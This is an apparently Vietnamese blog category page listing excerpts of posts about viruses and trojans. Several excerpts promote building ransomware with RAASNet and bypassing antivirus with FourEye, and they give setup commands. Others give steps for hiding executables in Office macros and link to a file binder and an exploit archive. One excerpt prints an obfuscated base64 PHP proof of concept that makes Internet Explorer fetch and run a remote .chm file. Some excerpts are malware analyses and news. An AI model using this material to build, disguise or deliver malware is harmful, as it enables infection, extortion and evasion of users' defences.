Portfolio
Virut/Trojan

Rassnet Ransomeware

December 21, 2020Category : Bug & Security Virut/Trojan

RAASNet có tác dụng gì? RAASNet là một công cụ bằng python giúp bạn tạo ra Ransomeware theo ý muốn, bạn có thể chọn các mã hóa file, nội dung thông báo đến nạn nhân và key giải mã. Đặc điểm: Tạo ransomware Tùy chỉnh giao diện cho ransomeware FUD (bypass antivirus) Hoạt động trên..

Read more
01.

Cách sử dụng FourEye để Bypass Antivirus

December 21, 2020Category : Bug & Security Virut/Trojan

Bài viết mang tính chất nghiên cứu Trên Kali linux, mở termial và gõ lệnh dưới đây để cài đặt FourEye git clone https://github.com/lengjibo/FourEye.gitcd FourEyepip install -r requirements.txtsudo apt-get install x86_64-w64-mingw32-gccpython3 BypassFramework.py Tại Menu chính, gõ lệnh help để xem cách sử dụng của tool bypass antivirus. Tiếp theo gõ lệnh list để liệt kê các tính năng của tool…

Read more
02.

FUD macro exploit… .doc/.xls

March 10, 2017Category : Virut/Trojan

1. Go to github.com/khr0x40sh/MacroShop and download all files. 2. Unzip your archive and open cmd. 3. Go to files directory via cmd and write “python exeinvba.py –exe test.exe –out test.vb” (test.exe is your file executed when macro starts). 4. Open new generated test.vb via notepad and copy all this code. 5. You can use this..

Read more
03.

Ms Office Exploit 2003,2007,2010,2013 Embed exe in doc

March 22, 2015Category : Virut/Trojan

Step 1: Download and install MetaSploit. Step 2: Open metasploit Console from start menu.

Read more
04.

Kiểm tra độ an toàn link tải từ VirusTotal Scan hoàn toàn mới

September 18, 2014Category : Virut/Trojan

Ứng dụng nhỏ giúp người dùng sử dụng sức mạnh của VirusTotal Scan để nhanh chóng kiểm tra tính an toàn của liên kết Download bằng dòng lệnh. Như đã biết, VirusTotal Scan là một ứng dụng web vô cùng hữu ích giúp người dùng quét virus trực tuyến với 40 công cụ cùng lúc…

Read more
05.

Bypassing Antivirus with Msfencode

July 27, 2012Category : Bug & Security Virut/Trojan

What You Need A BackTrack Linux machine, real or virtual. I used BackTrack 5 R2, but other versions of BackTrack are probably OK too. WARNING We are using some harmless test files, but don’t infect people with any real viruses–that’s a crime! Purpose Antivirus protects machines from malware, but not all of it. There are..

Read more
06.

autoit của công thịnh .com

March 12, 2009Category : Virut/Trojan

code virut auto it của site congthinh.com vẫn là autoit như mọi lần… nhưng lần này có thêm 1 số file mới extract ra file .jpg đổi đuôi thành .zip và extract 1 lần nữa pass: 123456 Các file extract ra: apps.dat inst.dat mc.dat pk.bin rinst.exe titles.dat vinh.exe Xinh.exe Xinhhk.dll

Read more
07.

Phân tích virus SafeSys

March 11, 2009Category : Virut/Trojan

Tên virus : SafeSys Loại : autorun, lây file Mức độ : nguy hiểm Khuyến cáo : khi sử dụng máy ảo để chạy thử virus phải tắt hết những đường share với máy thật -> ko khéo máy thật dính thì lại càng nguy ! Thông tin thêm : virus có khả năng qua..

Read more
08.

EXE,JPG File Binder

October 29, 2008Category : Bug & Security Virut/Trojan

link down (you can login) [hidepost]http://rapidshare.com/files/158400909/exebinder2.5.rar[/hidepost]

Read more
09.

virut [MIXA_I] v1.0.0.2

June 28, 2008Category : Virut/Trojan

1. Loại malware này khi nhiễm vào máy sẽ tạo key vào Registry ở hive HKLM. Mở rộng với 3 key [OptionalComponents]. Thừa hưởng tính năng SupperHidden của dòng họ [Autorun Virus]

Read more
010.

Diệt virus Global.exe (w32.Boom.worm)

June 28, 2008Category : Virut/Trojan

Tạo các process : C:WINDOWSsystem32dllcacheRecycler.{645FF040-5081-101B-9F08-00AA002F954E}svchost.exe Path thật : C:WINDOWSsystem32dllcachesvchost.exe C:WINDOWSsystem32dllcacheRecycler.{645FF040-5081-101B-9F08-00AA002F954E}system.exe Path thật : C:WINDOWSsystem32dllcachesystem.exe C:WINDOWSsystem32dllcacheRecycler.{645FF040-5081-101B-9F08-00AA002F954E}Global.exe Path thật : C:WINDOWSsystem32dllcacheGlobal.exe Các process này cùng chạy và bảo vệ lẫn nhau (Khi bạn Kill 1 process thì các process còn lại sẽ gọi lại process vừa bị Kill)

Read more
011.

[Phân tích] Secret (PhimNguoiLon.exe)

June 27, 2008Category : Virut/Trojan

Bài của Dungcoi * Tên malware: SecretC * Thuộc họ: Secret * Loại: Worm * Xuất xứ : Việt Nam * Kích thước: 112kb (Đã pack), 250kb (Chưa pack) * Mức độ phá hoại: Ko rõ Nguy cơ: Bị KeyLog, mất các thông tin quan trọng như mật khẩu… Do có tính năng tự down..

Read more
012.

Phân tích Virus OSA.exe

June 27, 2008Category : Virut/Trojan

Bài của DungCoi Nguyên tắc khi phân tích virus : 1. Không tìm cách xóa virus trong hệ thống. Có thể bạn ngạc nhiên về điều này, nhưng thực ra, cái chúng ta muốn thực hiện đó là dừng hoàn toàn virus làm việc, còn việc lưu trữ chúng hoàn toàn là không cần thiết…

Read more
013.

Xuất hiện virus mã hóa dữ liệu của người dùng tại Việt Nam

June 25, 2008Category : Virut/Trojan

Hãng bảo mật Kaspersky cuối tuần qua đã phải lên tiếng kêu gọi sự giúp đỡ của cộng đồng để bẻ khóa cơ chế mã hóa 1024-bit RSA được tin tặc ứng dụng trong phiên bản mới Trojan Gpcode. Một khi con Trojan này đột nhập thành công vào PC nó sẽ ngay lập tức..

Read more
014.

[malware]Microsoft Internet Explorer File Attachment Script Execution Vulnerability

June 21, 2008Category : Virut/Trojan

The following proof of concept was provided by “[email protected]” <[email protected]>: <? function malware() { header(“Content-type: text/html”); header(“Content-Disposition: attachment”); echo base64_decode( ‘PGltZyBkeW5zcmM9Imh0dHA6Ly93d3cubWFsd2FyZS5jb20vbW’. ‘Fsd2FyZS9tYWx3YXJlLmNobSIgd2lkdGg9MSBoZWlnaHQ9MT4N’. ‘Cg0KPFNDUklQVD4NCg0KLy8gNy4wMi4wMiBodHRwOi8vd3d3Lm’. ‘1hbHdhcmUuY29tDQoNCi8vIHlvdSBtYXkgY29uc2lkZXIgd3Jp’. ‘dGluZyBzZXZlcmFsIGxpbmVzDQovLyBpbiBjYXNlIG1hbHdhcm’. ‘UuY2htIGFycml2ZXMgYXMgWzFdIG9yIFsyXSBldGMNCg0KZnVu’. ‘Y3Rpb24gbWFsd2FyZSgpDQp7DQpzPWRvY3VtZW50LlVSTDsNCn’. ‘BhdGg9cy5zdWJzdHIoLTAscy5sYXN0SW5kZXhPZigiXFwiKSk7’. ‘DQpwYXRoPXVuZXNjYXBlKHBhdGgpOw0KZG9jdW1lbnQud3JpdG’. ‘UoJzxGT1JNIG5hbWU9Im1hbHdhcmUiIEFDVElPTj0iamF2YXNj’. ‘cmlwdDp3aW5kb3cuc2hvd0hlbHAoZG9jdW1lbnQuZm9ybXNbMF’. ‘0uZWxlbWVudHNbMF0udmFsdWUpIj4nKTsNCmRvY3VtZW50Lndy’. ‘aXRlKCc8Zm9ybT48aW5wdXQgdHlwZT0iaGlkZGVuIiAgc2l6ZT’. ‘0iNDAiIG1heGxlbmd0aD0iODAiIHZhbHVlPSInK3BhdGgrJ1xc’. ‘bWFsd2FyZVsxXS5jaG0iPjwvZm9ybT4nKTsNCnNldFRpbWVvdX’. ‘QoJ2RvY3VtZW50Lm1hbHdhcmUuc3VibWl0KCknLDEwMDAwKTsN’. ‘CiB9IA0Kc2V0VGltZW91dCgibWFsd2FyZSgpIiwyNTAwKTsgIA’. ‘0KPC9TQ1JJUFQ+DQogDQoNCg==’.”);} { malware(); } PHP ?>

Read more
015.

[malware]Microsoft Internet Explorer Self Executing HTML File Vulnerability

June 21, 2008Category : Virut/Trojan

Exploit: http://rapidshare.com/files/124044383/_malware_Microsoft_Internet_Explorer_Self_Executing_HTML_File_Vulnerability.rar

Read more
016.
© Oliver / All rights reserved.
To top